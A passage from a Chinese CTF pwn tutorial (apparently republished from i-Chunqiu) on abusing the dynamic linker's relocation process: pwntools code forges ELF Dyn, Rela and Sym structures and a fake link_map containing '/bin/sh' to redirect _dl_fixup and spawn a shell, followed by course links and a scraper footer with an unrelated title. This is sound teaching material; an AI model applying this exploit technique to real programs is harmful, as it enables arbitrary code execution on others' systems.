后面的link_map數(shù)據(jù)由于我們用不上就不構(gòu)造了。根據(jù)我們的分析,我們留出來四個(gè)8字節(jié)數(shù)據(jù)區(qū)用來填充相應(yīng)的數(shù)據(jù),其他部分都置為0.
接下來我們偽造出三個(gè)結(jié)構(gòu)體
fake_Elf64_Dyn = ""
fake_Elf64_Dyn += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#d_tag
fake_Elf64_Dyn += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#d_ptr
fake_Elf64_Rela = ""
fake_Elf64_Rela += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#r_offset
fake_Elf64_Rela += p64(7)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#r_info
fake_Elf64_Rela += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#r_addend
fake_Elf64_Sym = ""
fake_Elf64_Sym += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#st_name
fake_Elf64_Sym += 'AAAA'? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#st_info, st_other, st_shndx
fake_Elf64_Sym += p64(main_got-8)? ?? ?? ?#st_value
fake_Elf64_Sym += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#st_size
顯然我們必須把r_info設(shè)置為7以通過檢查。為了使ELFW(ST_VISIBILITY) (sym->st_other)不為0從而躲過_dl_lookup_symbol_x,我們直接把st_other設(shè)置為非0.st_other也必須為非0以避開_dl_lookup_symbol_x,進(jìn)入我們希望要的分支。
我們注意到fake_link_map中間有許多用\x00填充的空間,這些地方實(shí)際上寫啥都不影響我們的攻擊,因此我們充分利用空間,把三個(gè)結(jié)構(gòu)體跟/bin/sh\x00也塞進(jìn)去。
offset = 0x253a0 #system - __libc_start_mainfake_Elf64_Dyn = ""
fake_Elf64_Dyn += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #d_tag? ?? ?? ?? ?? ? 從link_map中找.rel.plt不需要用到標(biāo)簽, 隨意設(shè)置
fake_Elf64_Dyn += p64(fake_link_map_addr + 0x18)? ?? ?? ?? ?? ? #d_ptr? ?? ?? ?? ?? ? 指向偽造的Elf64_Rela結(jié)構(gòu)體,由于reloc_offset也被控制為0,不需要偽造多個(gè)結(jié)構(gòu)體
fake_Elf64_Rela = ""
fake_Elf64_Rela += p64(fake_link_map_addr - offset)? ?? ?? ?? ?? ? #r_offset? ?? ???rel_addr = l->addr+reloc_offset,直接指向fake_link_map所在位置令其可讀寫就行
fake_Elf64_Rela += p64(7)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #r_info? ?? ?? ?? ?? ? index設(shè)置為0,最后一字節(jié)必須為7
fake_Elf64_Rela += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #r_addend? ?? ???隨意設(shè)置
fake_Elf64_Sym = ""
fake_Elf64_Sym += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #st_name? ?? ???隨意設(shè)置
fake_Elf64_Sym += 'AAAA'? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #st_info, st_other, st_shndx st_other非0以避免進(jìn)入重定位符號(hào)的分支
fake_Elf64_Sym += p64(main_got-8)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#st_value? ?? ???已解析函數(shù)的got表地址-8,-8體現(xiàn)在匯編代碼中,原因不明
fake_Elf64_Sym += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #st_size? ?? ???隨意設(shè)置
fake_link_map_data = ""
fake_link_map_data += p64(offset)? ?? ?? ?? ?? ?? ?? ?? ?#l_addr,偽造為兩個(gè)函數(shù)的地址偏移值
fake_link_map_data += fake_Elf64_Dyn
fake_link_map_data += fake_Elf64_Rela
fake_link_map_data += fake_Elf64_Sym
fake_link_map_data += '\x00'*0x20
fake_link_map_data += p64(fake_link_map_addr)? ?? ?? ?? ?? ? #DT_STRTAB? ?? ???設(shè)置為一個(gè)可讀的地址
fake_link_map_data += p64(fake_link_map_addr + 0x30)#DT_SYMTAB? ?? ???指向?qū)?yīng)結(jié)構(gòu)體數(shù)組的地址
fake_link_map_data += "/bin/sh\x00"? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
fake_link_map_data += '\x00'*0x78
fake_link_map_data += p64(fake_link_map_addr + 0x8)? ?? ???#DT_JMPREL? ?? ???指向?qū)?yīng)數(shù)組結(jié)構(gòu)體的地址
現(xiàn)在我們需要做的就是棧劫持,偽造參數(shù)跳轉(zhuǎn)到_dl_fixup了。前兩者好說,_dl_fixup地址也在got表中的第2項(xiàng)。但是問題是這是一個(gè)保存了函數(shù)地址的地址,我們沒辦法放在棧上用ret跳過去,難道要再用一次萬能gadgets嗎?不,我們可以選擇這個(gè):
把這行指令地址放到棧上,用ret就可以跳進(jìn)_fix_up.現(xiàn)在我們需要的東西都齊了,只要把它們組裝起來,pwn it!
?課后例題和練習(xí)題非常重要,小伙伴請(qǐng)務(wù)必進(jìn)行練習(xí),進(jìn)群后管理員會(huì)給大家發(fā)放哦。
練習(xí)題獲取入口
新來的朋友如果想要了解其他的必備技能和實(shí)用工具,可以點(diǎn)擊菜單欄中的入門錦囊查看相關(guān)內(nèi)容:
文章素材來源于i春秋社區(qū)
●?入門教程第一章:環(huán)境配置
●?入門教程第二章:棧溢出基礎(chǔ)
●?入門教程第三章:ShellCode
●?入門教程第四章:ROP技術(shù)
●?入門教程第五章:調(diào)整棧幀的技巧
●?入門教程第六章:利用漏洞獲取libc
●?入門教程第七章:格式化字符串漏洞
●?入門教程第八章:PIE與bypass思路
●?入門教程第九章:SROP
●?入門教程第十章:stack canary與繞過的思路
●?入門教程第十一章:針對(duì)函數(shù)重定位流程的相關(guān)測(cè)試
熱門回顧
/陷阱
安全意識(shí)必不可少
/培訓(xùn)
滲透測(cè)試必備知識(shí)
End
i春秋官方公眾號(hào)為大家提供
前沿的網(wǎng)絡(luò)安全技術(shù)
簡(jiǎn)單易懂的實(shí)用工具
緊張刺激的安全競(jìng)賽
還有網(wǎng)絡(luò)安全大講堂
更多技能等你來解鎖
總結(jié)
以上是生活随笔為你收集整理的c# 定位内存快速增长_CTF丨Linux Pwn入门教程:针对函数重定位流程的相关测试(下)...的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: inh是什么意思
- 下一篇: linux ssh 推送文件_WinSC